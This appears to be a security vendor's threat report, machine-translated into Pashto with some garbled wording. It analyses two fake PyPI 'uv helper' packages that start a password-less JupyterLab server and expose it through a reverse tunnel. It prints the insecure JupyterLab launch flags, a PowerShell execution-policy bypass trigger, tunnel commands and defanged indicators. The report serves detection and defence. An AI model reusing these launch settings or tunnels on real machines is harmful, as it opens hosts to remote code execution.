جعلي UV: جعلي PyPI uv کڅوړې جوپایټر ویب ته پرانیزي

FauxUV: جعلي PyPI uv مرسته کوونکي چې انټرنیټ ته یو غیر تصدیق شوی Jupyter سرور پرانیزي

د تمديد؛ DR

د PyPI کڅوړو یوې ډلې د نوم پور اخیستی دی uv، د زنګ پر بنسټ د پایتون د پیکج ګړندی، خورا مشهور مدیر، د UV مرستندویانو په توګه د ځان ښودلو لپاره. دوی تقریبا هیڅ ریښتینی فعالیت نه لیږدوي. هغه څه چې دوی یې پرځای لیږدوي هغه د وینډوز پیلوډ دی چې ولاړ دی a د JupyterLab سرور د تصدیق سره بند شوی او په وروستیو نسخو کې، دا د یوې برعکس تونل له لارې عامه انټرنیټ ته خپروي.

دا ټوله کیسه په یوه کرښه کې ده: د باور وړ وسیلې نوم د لالچ په توګه، او JupyterLab د ریموټ کوډ اجرا کولو انجن په توګه. د جوپایټر سرور هر هغه کوډ چلوي چې تاسو یې په not کې ټایپ کوئebook حجره؛ یو چې د خالي ټوکن سره پیل شوی او د هرې شبکې انٹرفیس سره تړلی دی یو خلاص ژباړونکی دی چې هرڅوک چې بندر ته رسیدلی شي کولی شي چلوي.

موږ کلستر په لاندې ډول تعقیبوو: فاکس یو وی. دوه معاینه شوي کڅوړې دي moon-uv (0.0.1-0.0.16) او my-magic-uv-helper (0.0.1)، د ورته آپریټر لخوا خپور شوی او د تحلیل په وخت کې په PyPI کې ژوندی دی.

اکسيستمPyPI
پيکيجزmoon-uv (0.0.1-0.0.16)، my-magic-uv-helper (0.0.1)
پلیټ فارم په نښه شویWindows
اصلي چلندد JupyterLab غیر تصدیق شوی سرور، د ریورس تونل له لارې انټرنیټ ته خپور شوی
له قانوني وسایلو ناوړه ګټه اخیستل شوېیو وی، جوپیټر لیب، کلاوډ فلارډ، پنګي

لالچ: یو نوم چې تاسو دمخه باور لرئ

uv د تیرو دوو کلونو یو له خورا نصب شوي پایتون وسیلو څخه دی، نو "د دې لپاره یو مرستندوی" دی uv"یو داسې بسته ده چې پراختیا ورکوونکی یې پرته له کوم فکر څخه نصبوي. FauxUV خپل اعتبار په بشپړ ډول په دې نوم مصرفوي. بستې پوښي سمه ده uv د اسټرال څخه انسټالر - په ریښتیني، معتبر کوربه کې د پیلوډ نقطې کې URLs - نو یو چټک نظر د باور وړ حوالو پرته بل څه نه ګوري. هیڅ یو پیکج په حقیقت کې نه اضافه کوي uv فعالیت؛ نوم ټول نقاب دی.

JupyterLab د RCE انجن په توګه

د پیلوډ مرکزي برخه یو لانچر دی چې د هر ساتونکي پټلۍ لرې کولو سره JupyterLab پیل کوي:

jupyter server --with jupyterlab   --ip=0.0.0.0            # listen on every interface   --ServerApp.token=""    # no password, no token   --allow_origin='*'      # accept cross-origin connections   --disable_check_xsrf    # allow a remote browser/WebSocket to drive it

هر بیرغ یو محافظت لرې کوي، او لیږل شوی سکریپټ حتی دوی تشریح کوي (په اصلي چینایي کې): خالي نښه "د پټنوم او ټوکن چکونه بندوي - هرڅوک کولی شي وصل شي." jupyter لابراتوار د معلوماتو ساینس یو قانوني IDE دی، مګر نهebook حجره د ډیزاین له مخې خپل سري کوډ اجرا کوي. په دې ډول تنظیم شوی او تړل شوی 0.0.0.0، دا د IDE کیدو مخه نیسي او په کوربه کې یو غیر تصدیق شوی ریموټ شیل کیږي - هیڅ دودیز مالویر بائنری ته اړتیا نشته، یوازې یو اصلي وسیله چې غلطه لاره یې په ګوته کړې.

دوه ملاتړي ټوټې دا د لاسرسي وړ او تکرار وړ کوي:

  • د خاموش نصبولو محرک. لومړني نسخې د پاورشیل سره چلوي - د اجرا کولو پالیسي بای پاس مستقیم څخه setup.py on د پایپ نصب کول، په شاليد کې د تېروتنو سره چې پټ شوي دي نو برابرېږي عادي ښکاري. وروسته نسخې ورته لومړني په a کې لیږدوي پایپ-یووی د کمانډ لاین وسیله - او د نصب وخت اتومات چلول په بشپړ ډول پریږدئ.
  • یو عامه برعکس تونل. یو سرور په 0.0.0.0 لاهم یوازې د کوربه لخوا د لاسرسي وړ دی چې ماشین ته لاره پیدا کولی شي. یو بنډل شوی ماډل [Pinggy]( پرانیزيhttps://pinggy.io/) د SSH ریورس تونل چې د جوپایټر سیمه ایز بندر عامه پتې ته لیږدوي، دا حد لرې کوي. لیږل شوی سکریپټ د کلاوډ فلیر په کارولو سره یو بدیل لاره هم لري - تبصره شوې - ورېځ ځلېدلی او د netsh د لینوډ IP لپاره پورټ پراکسي، د مختلفو زیربناوو له لارې ورته هدف مستند کول.

یوځای کړئ: بسته نصب کړئ، او د وینډوز کوربه به د پټنوم پرته JupyterLab چلوي او خلاص انټرنیټ ته یې خپروي.

څنګه FauxUV وده وکړه

د FauxUV نسخې په چټکۍ سره لیږدول شوې، او د پیلوډ ټریګر نقطه د دوی په اوږدو کې حرکت وکړ - دا یادونه کوي چې یو بیرغ شوی نسخه په ندرت سره د پیکج لاین ټوله کیسه بیانوي.

مرحله بڼه تورګر هغه څه چې اضافه کوي
د نصبولو هک moon-uv 0.0.1–0.0.3 ، my-magic-uv-helper 0.0.1 setup.py په پایپ نصب کې د UV نصب + PATH پریپنډ
د CLI چلولو وخت moon-uv 0.0.5-0.0.13 pip-uv د قوماندې بې پاسورډ-جوپیټرلیب لانچر
تونل moon-uv 0.0.14-0.0.16 pip-uv د قوماندې یو فعال پینګي ریورس تونل

د پام وړ، د نصبولو وخت اتومات چلول وو لرې په وروستیو، ډیر وړ نسخو کې - نو یو سکینر یوازې د ژوند دورې ته کیلي وه hooks نوي ریلیزونه به په دې ډول نمره کړي لږ خطرناک، په سمه توګه برعکس.

د جوړجاړي شاخصونه

د پیکج سرچینې په لوستلو سره تایید شوی؛ د پای ټکي په نښه شوي تبصره وکړه په فایلونو کې شتون لري مګر د تحلیل شوي نسخې لخوا نه اجرا کیږي. د شبکې شاخصونه خراب شوي دي.

ډول شاخص
د نصبولو امر powershell -ExecutionPolicy Bypass د پایپ نصبولو په وخت کې د اصلي UV انسټالر راوړل
د JupyterLab بیرغونه --ip=0.0.0.0 --ServerApp.token="" --allow_origin='*' --disable_check_xsrf
برعکس تونل (فعال) free[.]pinggy[.]io:443 ځايي لېږل 127.0.0.1:8888
د تونل کوربه (تبصره شوې) cloudflared tunnel --url hxxp://127[.]0[.]0[.]1:2718
IP (تبصره شوې) 45[.]79[.]134[.]161 (لینوډ) له لارې netsh port-proxy
دوام مخکې ورکول %USERPROFILE%\.local\bin کارونکي ته PATH

د چلند نښې چې د خبرتیا ارزښت لري، د دې دقیقو تارونو څخه خپلواک: a د پایپ نصب کول چې زېږوي پاورشیل - د اجرا کولو پالیسي بای پاس; هر یو جوپېټر د لانچ ترکیب نښه = "" سره - آی پي = 0.0.0.0؛ او بهر ته SSH ته *.pingy.io د پراختیا کونکي یا CI ماشین څخه.

مشاهده شوی چلند او سرچینه

دوه کڅوړې یو لیکوال او یو میتود شریکوي: د باوري وسیلې نوم، یوازې د وینډوز ګیټینګ، د غلطۍ له امله د شالید اجرا کول، او په معتبر وسیلو تکیه کول نو یو چټک نظر یوازې معتبر URLونه ګوري. سرچینه د چینایي ژبې نظرونه لري چې د امنیت پورې اړوند بیرغونه په واضح ډول بیانوي؛ موږ دا په فایل کې د لیدلو وړ بیانونو په توګه راپور ورکوو، نه د انګیزې په اړه د ادعا په توګه. اجازه_ورکړئ ارزښت او الف colab.bat د د فایل نوم د ګوګل کولاب لپاره د غیر رسمي "زما سیمه ایز رن ټایم شریک کړئ" کاري فلو ته اشاره کوي. هر څه چې اصل وي، بسته شوې پایله ورته ده.

د مدافعینو لپاره اغیز او لارښوونې

څوک چې د FauxUV سره مخ کیږي. د وینډوز پراختیا کونکي او د CI چلونکي چې د پایپ نصب کول د دې کڅوړو څخه یو. یو بې پاسورډ JupyterLab په 0.0.0.0 د هر هغه چا لپاره چې پورټ ته رسیدلی شي د لرې کوډ اجرا کول دي؛ تونل د "څوک ورته رسیدلی شي" حد لرې کوي. سرور د نصب کونکي کارونکي په توګه چلیږي، د هغه کارونکي فایلونه، ټوکنونه، او کلاوډ اسناد په میراث اخلي.

ولې له لاسه ورکول اسانه دي. د شبکې هر تار یو معتبر کوربه ته اشاره کوي — اسټرال، جوپیټر لیب، ورېځ ځلېدلی، پینګي، کولاب. د هش لپاره هیڅ مالویر بائنری نشته او د کوډ کولو لپاره هیڅ پټ بلاب نشته. شهرت - او د لاسلیک پر بنسټ سکین کول دواړه د دې وزن کموي، له همدې امله د چلند پوښتنه - د دې کڅوړې نصب کول ماشین څه کوي؟ - هغه څوک دی چې دا نیسي.

لارښوونه:

  • د نصبولو هر وخت په پام کې ونیسئ پاورشیل - د اجرا کولو پالیسي بای پاس د جوړونې ماتونکي سیګنال په توګه، هر هغه URL چې دا راوړي.
  • خبرتیا فعاله ده جوپېټر د خالي نښه سره پیل شو او - آی پي = 0.0.0.0؛ دا ترکیب باید هیڅکله په ورک سټیشن یا رنر کې څرګند نشي.
  • د تونل چمتو کونکو ته د SSH څخه بهر ته د څارنې لپاره (*.pingy.io, *.trycloudflare.com) د پراختیا کونکي او CI چاپیریال څخه.
  • ولګوه uv د [د هغې رسمي سرچینې] څخه (https://docs.astral.sh/uv/) او د دریمې ډلې "مرسته کوونکي" کڅوړو په اړه شکمن اوسئ چې د نصبولو لپاره دمخه کوچنۍ وسیله پوښي.
  • په اپ گریڈ کې انحصارونه پین ​​او بیاکتنه کړئ — د بسته بندۍ لاین کولی شي د نسخې په پرتله نوي وړتیا وده وکړي.
د سکا-وسایل-سافټویر-ترکیب-تحلیل-وسایل
د خپل سافټویر خطرونو ته لومړیتوب ورکړئ، اصلاح یې کړئ او خوندي یې کړئ
خپل وړیا حساب ترلاسه کړئ.
هیڅ کریډیټ کارت ته اړتیا نشته.

د خپل سافټویر پراختیا او تحویلي خوندي کړئ

د زیګیني محصول سویټ سره